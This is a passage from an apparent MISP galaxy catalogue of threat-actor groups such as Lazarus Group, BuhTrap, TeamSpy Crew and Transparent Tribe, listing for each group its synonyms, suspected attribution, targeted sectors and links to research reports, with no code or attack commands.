- http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf - webarchive
- https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor - webarchive
- https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - webarchive
- https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/ - webarchive
- https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain - webarchive
- https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf - webarchive
- https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf - webarchive
- https://attack.mitre.org/groups/G0008/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html - webarchive
- https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://blog.morphisec.com/fin7-attacks-restaurant-industry - webarchive
- https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/ - webarchive
- https://blog.morphisec.com/fin7-attack-modifications-revealed - webarchive
- https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - webarchive
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://attack.mitre.org/groups/G0046/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://threatintel.blog/OPBlueRaven-Part1/ - webarchive
- https://threatintel.blog/OPBlueRaven-Part2/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
motive | Cybercrime |
Related clusters
To see the related clusters, click here.
TeamSpy Crew
Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamSpy Crew.
Known Synonyms |
---|
Anger Bear |
IRON LYRIC |
Team Bear |
TeamSpy |
Internal MISP references
UUID 82c1c7fa-c67b-4be6-9be8-8aa400ef2445
which can be used as unique global reference for TeamSpy Crew
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/team-spy-crew - webarchive
- https://threatpost.com/researchers-uncover-teamspy-attack-campaign-targeting-government-research-targets-032013/77646/ - webarchive
- https://www.crysys.hu/publications/files/teamspy.pdf - webarchive
- https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20134928/theteamspystory_final_t2.pdf - webarchive
- https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Hungary', 'Belarus'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Activists', 'Intelligence', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
BuhTrap
Buhtrap has been active since 2014, however their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016 Buhtrap managed to conduct 13 successful attacks against Russian banks for a total amount of 1.8 billion rubles ($25.7 mln). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network. As a result, banks have to shut down the whole infrastructure which provokes delay in servicing customers and additional losses. Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central Bank of Russia (further referred to as BCS CBR). We have not identified incidents of attacks involving online money transfer systems, ATM machines or payment gates which are known to be of interest for other criminal groups.
Internal MISP references
UUID b737c51f-b579-49d5-a907-743b2e6d03cb
which can be used as unique global reference for BuhTrap
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/ - webarchive
- https://www.group-ib.com/brochures/gib-buhtrap-report.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.forcepoint.com/blog/security-labs/highly-evasive-code-injection-awaits-user-interaction-delivering-malware - webarchive
- https://www.kaspersky.com/blog/financial-trojans-2019/25690/ - webarchive
- https://www.welivesecurity.com/2015/04/09/operation-buhtrap/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank', 'Payment', 'Finance'] |
WOLF SPIDER
FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WOLF SPIDER.
Known Synonyms |
---|
FIN4 |
G0085 |
Internal MISP references
UUID ff449346-aa9f-45f6-b482-71e886a5cf57
which can be used as unique global reference for WOLF SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623 - webarchive
- https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf - webarchive
- https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html - webarchive
- https://attack.mitre.org/groups/G0085/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RO |
targeted-sector | ['Health', 'Finance', 'Pharmacy'] |
Boulder Bear
First observed activity in December 2013.
Internal MISP references
UUID 85b40169-3d1c-491b-9fbf-877ed57f32e0
which can be used as unique global reference for Boulder Bear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
SHARK SPIDER
This group's activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.
Internal MISP references
UUID 7dd7a8df-9012-4d14-977f-b3f9f71266b4
which can be used as unique global reference for SHARK SPIDER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank'] |
UNION SPIDER
Adversary targeting manufacturing and industrial organizations.
Internal MISP references
UUID db774b7d-a0ee-4375-b24e-fd278f5ab2fd
which can be used as unique global reference for UNION SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Manufacturing', 'Industrial'] |
Silent Chollima
Andariel is a threat actor that primarily targets South Korean corporations and institutions. They are believed to collaborate with or operate as a subsidiary organization of the Lazarus threat group. WHOIS utilizes spear phishing attacks, watering hole attacks, and supply chain attacks for initial access. They have been known to exploit vulnerabilities and use malware such as Infostealer and TigerRAT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silent Chollima.
Known Synonyms |
---|
Andariel |
GOP |
Guardian of Peace |
Onyx Sleet |
OperationTroy |
PLUTONIUM |
Subgroup: Andariel |
WHOis Team |
Internal MISP references
UUID 245c8dde-ed42-4c49-b48b-634e3e21bdd7
which can be used as unique global reference for Silent Chollima
in MISP communities and other software using the MISP galaxy
External references
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | KP |
Lazarus Group
Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lazarus Group.
Known Synonyms |
---|
APT 38 |
APT-C-26 |
APT38 |
ATK117 |
ATK3 |
Andariel |
Appleworm |
BeagleBoyz |
Bluenoroff |
Bureau 121 |
COPERNICIUM |
COVELLITE |
Citrine Sleet |
DEV-0139 |
DEV-1222 |
Dark Seoul |
Diamond Sleet |
G0032 |
G0082 |
Group 77 |
Hastati Group |
Hidden Cobra |
Labyrinth Chollima |
Lazarus group |
NICKEL GLADSTONE |
NewRomanic Cyber Army Team |
Nickel Academy |
Operation AppleJeus |
Operation DarkSeoul |
Operation GhostSecret |
Operation Troy |
Sapphire Sleet |
Stardust Chollima |
Subgroup: Bluenoroff |
TA404 |
Unit 121 |
Whois Hacking Team |
ZINC |
Zinc |
Internal MISP references
UUID 68391641-859f-4a9a-9a1e-3e5cf71ec376
which can be used as unique global reference for Lazarus Group
in MISP communities and other software using the MISP galaxy
External references
- https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/ - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-164A - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-318A - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-318B - webarchive
- https://securelist.com/operation-applejeus/87553/ - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
- https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/lazarus-group - webarchive
- https://www.cfr.org/interactive/cyber-operations/operation-ghostsecret - webarchive
- https://www.cfr.org/interactive/cyber-operations/compromise-cryptocurrency-exchanges-south-korea - webarchive
- https://www.bleepingcomputer.com/news/security/lazarus-group-deploys-its-first-mac-malware-in-cryptocurrency-exchange-hack/ - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/ - webarchive
- https://www.theguardian.com/world/2009/jul/08/south-korea-cyber-attack - webarchive
- https://web.archive.org/web/20131123012339/https://www.symantec.com/connect/blogs/trojankoredos-comes-unwelcomed-surprise - webarchive
- https://www.nytimes.com/2013/03/21/world/asia/south-korea-computer-network-crashes.html - webarchive
- https://web.archive.org/web/20130607233212/https://www.symantec.com/connect/blogs/south-korean-financial-companies-targeted-castov - webarchive
- https://web.archive.org/web/20130701021735/https://www.symantec.com/connect/blogs/four-years-darkseoul-cyberattacks-against-south-korea-continue-anniversary-korean-war - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/the-hack-of-sony-pictures-what-you-need-to-know - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/ - webarchive
- https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR19-129A - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/ - webarchive
- https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/ - webarchive
- https://www.theregister.co.uk/2019/04/10/lazarus_group_malware/ - webarchive
- https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf - webarchive
- https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-into-the-lazarus-groups-operations - webarchive
- https://www.kaspersky.com/about/press-releases/2017_chasing-lazarus-a-hunt-for-the-infamous-hackers-to-prevent-large-bank-robberies - webarchive
- https://medium.com/threat-intel/lazarus-attacks-wannacry-5fdeddee476c - webarchive
- https://attack.mitre.org/groups/G0032/ - webarchive
- https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/ - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.bankinfosecurity.com/vietnamese-bank-blocks-1-million-online-heist-a-9105 - webarchive
- https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD - webarchive
- https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/what-we-can-learn-from-the-bangladesh-central-bank-cyber-heist/ - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware - webarchive
- https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html - webarchive
- https://www.bloomberg.com/news/articles/2018-05-29/mexico-foiled-a-110-million-bank-heist-then-kept-it-a-secret - webarchive
- https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/ - webarchive
- https://www.darkreading.com/attacks-breaches/north-korean-hacking-group-steals-$135-million-from-indian-bank-/d/d-id/1332678 - webarchive
- https://www.zdnet.com/article/north-korean-hackers-infiltrate-chiles-atm-network-after-skype-job-interview/ - webarchive
- https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-gladstone - webarchive
- https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html - webarchive
- https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/ - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/covellite - webarchive
- https://www.hvs-consulting.de/lazarus-report/ - webarchive
- https://github.com/hvs-consulting/ioc_signatures/tree/main/Lazarus_APT37 - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html - webarchive
- https://attack.mitre.org/groups/G0082 - webarchive
- https://attack.mitre.org/groups/G0032 - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://www.securonix.com/blog/securonix-threat-labs-monthly-intelligence-insights-june-2023/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-048a - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['South Korea', 'Bangladesh Bank', 'Sony Pictures Entertainment', 'United States', 'Thailand', 'France', 'China', 'Hong Kong', 'United Kingdom', 'Guatemala', 'Canada', 'Bangladesh', 'Japan', 'India', 'Germany', 'Brazil', 'Thailand', 'Australia', 'Cryptocurrency exchanges in South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | ['Espionage', 'Sabotage'] |
country | KP |
Related clusters
To see the related clusters, click here.
VICEROY TIGER
VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VICEROY TIGER.
Known Synonyms |
---|
APT-C-35 |
Donot Team |
OPERATION HANGOVER |
Orange Kala |
SectorE02 |
Internal MISP references
UUID e2b87f81-a6a1-4524-b03f-193c3191d239
which can be used as unique global reference for VICEROY TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://github.com/jack8daniels2/threat-INTel/blob/master/2013/Unveiling-an-Indian-Cyberattack-Infrastructure-appendixes.pdf - webarchive
- https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/ - webarchive
- https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia - webarchive
- https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/ - webarchive
- https://www.crowdstrike.com/blog/viceroy-tiger-delivers-new-zero-day-exploit/index.html - webarchive
- https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ - webarchive
- https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://blog.cyble.com/2021/07/22/donot-apt-group-delivers-a-spyware-variant-of-chat-app/ - webarchive
- https://adversary.crowdstrike.com/en-US/adversary/viceroy-tiger - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-victims | ['Germany'] |
country | IN |
targeted-sector | ['Government, Administration', 'Security Service'] |
Related clusters
To see the related clusters, click here.
PIZZO SPIDER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PIZZO SPIDER.
Known Synonyms |
---|
Ambiorx |
DD4BC |
Internal MISP references
UUID dd9806a9-a600-48f8-81fb-07f0f1b7690d
which can be used as unique global reference for PIZZO SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | US |
Corsair Jackal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Corsair Jackal.
Known Synonyms |
---|
TunisianCyberArmy |
Internal MISP references
UUID 59d63dd6-f46f-4334-ad15-30d2e1ee0623
which can be used as unique global reference for Corsair Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TN |
SNOWGLOBE
In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SNOWGLOBE.
Known Synonyms |
---|
ATK8 |
Animal Farm |
Snowglobe |
Internal MISP references
UUID 3b8e7462-c83f-4e7d-9511-2fe430d80aab
which can be used as unique global reference for SNOWGLOBE
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/69114/animals-in-the-apt-farm/ - webarchive
- https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france - webarchive
- https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/ - webarchive
- https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/ - webarchive
- https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope - webarchive
- https://www.cfr.org/interactive/cyber-operations/snowglobe - webarchive
- https://resources.infosecinstitute.com/animal-farm-apt-and-the-shadow-of-france-intelligence/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | France |
cfr-suspected-victims | ['Syria', 'United States', 'Netherlands', 'Russia', 'Spain', 'Iran', 'China', 'Germany', 'Algeria', 'Norway', 'Malaysia', 'Turkey', 'United Kingdom', 'Ivory Coast', 'Greece'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | FR |
Deadeye Jackal
The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA has been the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies. The precise nature of SEA's relationship with the Syrian government has changed over time and is unclear
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Deadeye Jackal.
Known Synonyms |
---|
SEA |
SyrianElectronicArmy |
Internal MISP references
UUID 4265d44e-8372-4ed0-b428-b331a5443d7d
which can be used as unique global reference for Deadeye Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | SY |
targeted-sector | ['Country', 'Defense', 'Opposition', 'Political party', 'News - Media', 'Government, Administration'] |
Operation C-Major
Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Operation C-Major.
Known Synonyms |
---|
APT 36 |
APT36 |
C-Major |
COPPER FIELDSTONE |
Earth Karkaddan |
Green Havildar |
Mythic Leopard |
ProjectM |
TMP.Lapis |
Transparent Tribe |
Internal MISP references
UUID acbb5cad-ffe7-4b0e-a57a-2dbc916e8905
which can be used as unique global reference for Operation C-Major
in MISP communities and other software using the MISP galaxy
External references
- http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf - webarchive
- https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf - webarchive
- https://www.amnesty.org/en/documents/asa33/8366/2018/en/ - webarchive
- https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe - webarchive
- https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf - webarchive
- https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf - webarchive
- https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials - webarchive
- https://s.tencent.com/research/report/669.html - webarchive
- https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
- https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Pakistan |
cfr-target-category | ['Civil society', 'Military', 'Government'] |
country | PK |
targeted-sector | ['Activists', 'Civil society', 'Military'] |
Related clusters
To see the related clusters, click here.
Stealth Falcon
This threat actor targets civil society groups and Emirati journalists, activists, and dissidents.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Stealth Falcon.
Known Synonyms |
---|
FruityArmor |
G0038 |
Internal MISP references
UUID dab75e38-6969-4e78-9304-dc269c3cbcf0
which can be used as unique global reference for Stealth Falcon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United Arab Emirates |
cfr-suspected-victims | ['United Arab Emirates', 'United Kingdom'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | AE |
targeted-sector | ['Activists', 'Dissidents', 'Journalist', 'Civil society'] |
Related clusters
To see the related clusters, click here.
HummingBad
This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder
Internal MISP references
UUID 12ab5c28-5f38-4a2f-bd40-40e9c500f4ac
which can be used as unique global reference for HummingBad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
QUILTED TIGER
Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUILTED TIGER.
Known Synonyms |
---|
APT-C-09 |
ATK11 |
Chinastrats |
Dropping Elephant |
G0040 |
Monsoon |
Orange Athos |
Patchwork |
Sarit |
Thirsty Gemini |
ZINC EMERSON |
Internal MISP references
UUID 18d473a5-831b-47a5-97a1-a32156299825
which can be used as unique global reference for QUILTED TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982-77bd-41e0-8269-f2cc9ce3266e&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign - webarchive
- https://www.cymmetria.com/patchwork-targeted-attack/ - webarchive
- https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf - webarchive
- https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ - webarchive
- https://attack.mitre.org/groups/G0040/ - webarchive
- https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf - webarchive
- https://securelist.com/the-dropping-elephant-actor/75328/ - webarchive
- https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/zinc-emerson - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait - webarchive
